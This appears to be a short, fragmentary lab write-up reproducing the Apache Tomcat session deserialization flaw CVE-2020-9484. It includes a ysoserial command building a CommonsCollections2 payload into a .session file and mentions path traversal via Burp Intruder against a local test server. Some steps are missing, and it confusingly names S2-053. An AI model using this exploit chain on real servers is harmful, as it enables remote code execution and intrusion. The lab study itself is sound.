
用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞
Reproduce Apache Tomcat Session Deserialization Code Execution Vulnerability CVE-2020-9484 with Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
First visit S2-053 to check if it started normally:
http://192.168.152.128:8080/s2-053/
Re-access and capture packets, use intruder for path traversal


Command executed successfully:
Reference: https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg